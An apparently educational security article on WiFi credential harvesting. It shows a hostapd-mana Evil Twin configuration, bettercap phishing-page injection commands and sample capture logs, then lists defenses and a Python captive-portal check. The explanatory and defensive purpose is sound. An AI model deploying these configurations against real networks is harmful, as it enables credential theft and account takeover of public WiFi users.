Credential Harvesting: WiFi Attacks
Most public WiFi networks use a captive portal — a login or terms-of-service page that appears when you first connect and try to use the internet. You see this at hotels, airports, cafes, and airlines. It feels completely normal to see a login page after connecting to public WiFi.
Attackers exploit this by running a fake captive portal on the Evil Twin. The victim's device shows a captive portal when it tries to access the internet — just like a real one. The victim enters their credentials or email, and the attacker captures them.
Mana Toolkit Configuration for Credential Capture
Mana Toolkit's hostapd-mana includes a built-in credential harvesting module that captures 802.1X (enterprise WiFi) credentials automatically. For captive portal credentials, a custom HTTP server handles the phishing page.
    $ cat /etc/hostapd-mana/hostapd-mana.conf
    interface=wlan1
    driver=nl80211
    ssid=Hotel_Guest_WiFi
    channel=6
    hw_mode=g
    # Mana credential harvesting
    mana_cred_capture=1
    mana_cred_log=/var/log/mana_cred.log
    enable_mana=1
    mana_macaddr=00:11:22:33:44:55

    $ cat /var/log/mana_cred.log
    [Mana] EAP: user=john%40acmecorp.com
    [Mana] EAP: password=Summer2026!Q
    [Mana] timestamp=1744012847
    [Mana] BSSID=00:11:22:33:44:55 ESSID=Hotel_Guest_WiFi
    [Enterprise WiFi credentials captured — corporate network potentially compromised]
Phishing Pages Beyond Captive Portals
Beyond captive portals, attackers serve phishing pages that mimic popular services. When the victim tries to access Google, Facebook, or their corporate email, they see a familiar login page — but it's the attacker's server.
    $ # Using bettercap to inject a phishing module
    $ sudo bettercap -eval "set http.proxy.script /usr/share/bettercap/caplets/phishing/phishing-hotspot.cap"
    [bettercap]>> set http.proxy.script /usr/share/bettercap/caplets/phishing/phishing-hotspot.cap
    [bettercap]>> http.proxy on
    [http.proxy] Script: phishing-hotspot.cap
    # The phishing-hotspot.cap serves fake login pages for:
    # - Facebook, Google, Twitter, LinkedIn, Amazon
    # - Microsoft (Outlook/Office 365)
    # - Generic "WiFi Login Required" portals

    $ tail -f /var/log/bettercap-phish.log
    [*] Captured Facebook credentials
    User: sarah.johnson@example.com
    Pass: SecurePass#2026!
    IP: 192.168.1.147
    Time: 2026-04-07T14:23:11Z
What Attackers Do With Harvested Credentials
- Sell on dark web markets: Credential bundles sell for $1–$50 depending on the service. Corporate credentials are premium — sold to competitors, nation-states, or ransomware operators.
- Account takeover: Log in to the victim's email, social media, or financial accounts
- Corporate espionage: Access corporate VPN, email, Slack, and file sharing using harvested corporate credentials
- Lateral movement: Use corporate credentials to access internal systems, escalate privileges, and exfiltrate data
- Credential stuffing: Try the same username/password combination on other services (people reuse passwords)
If the victim used the same password for their hotel WiFi login and their corporate VPN, the attacker now has VPN access. If they used the same password for their email and their crypto exchange, the attacker can attempt account takeover there too. Credential reuse amplifies a single WiFi harvest into multi-system compromise.
Defense Against Credential Harvesting
- Use a VPN on all public WiFi: Prevents the attacker from seeing your traffic and serving you phishing pages
- Verify the captive portal URL: Real captive portals use the router's IP or a legitimate domain. Be suspicious of portals asking for passwords unrelated to the service (e.g., hotel WiFi asking for your email password)
- Don't reuse passwords: Use unique passwords for every service, managed by a password manager
- Enable 2FA/MFA: Even if credentials are captured, 2FA blocks account takeover on protected services
- Use a password manager: Password managers won't auto-fill credentials on unrecognized domains, protecting against phishing pages
- Corporate credential monitoring: Organizations should monitor for credential stuffing attempts against corporate services using dark web monitoring services
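The "verify the captive portal URL" check from the list above, written out as an added Python example (not part of the original page). The function name `assess_portal`, the warning labels, the trusted-domain list, and the sample pages are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit


class FormScan(HTMLParser):
    """Collect the type of every <input> on the portal page."""

    def __init__(self):
        super().__init__()
        self.input_types = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.input_types.append((dict(attrs).get("type") or "text").lower())


def assess_portal(url, html, gateway_ip, trusted_domains):
    """Return warning labels for a captive portal page; an empty list means none."""
    warnings = []
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    try:
        # IP-literal portal: it should be the default gateway (the router).
        known = ipaddress.ip_address(host) == ipaddress.ip_address(gateway_ip)
    except ValueError:
        # Named portal: exact match or subdomain of a domain the user expects.
        known = any(host == d or host.endswith("." + d) for d in trusted_domains)
    if not known:
        warnings.append("unrecognized-portal-host")
    scan = FormScan()
    scan.feed(html)
    if "password" in scan.input_types:
        # A WiFi portal asking for a password deserves a second look.
        warnings.append("asks-for-password")
        if parts.scheme != "https":
            warnings.append("password-over-plain-http")
    return warnings


# Constructed sample pages (not captured from any real network).
GATEWAY = "192.168.1.1"
TRUSTED = ["hotel.example"]
ROOM_PAGE = '<form><input name="room"><input name="surname"><input type="submit"></form>'
LOGIN_PAGE = '<form><input type="email" name="user"><input type="password" name="pw"></form>'

if __name__ == "__main__":
    print(assess_portal("http://192.168.1.1/guest", ROOM_PAGE, GATEWAY, TRUSTED))
    print(assess_portal("http://wifi-login.example.net/", LOGIN_PAGE, GATEWAY, TRUSTED))
```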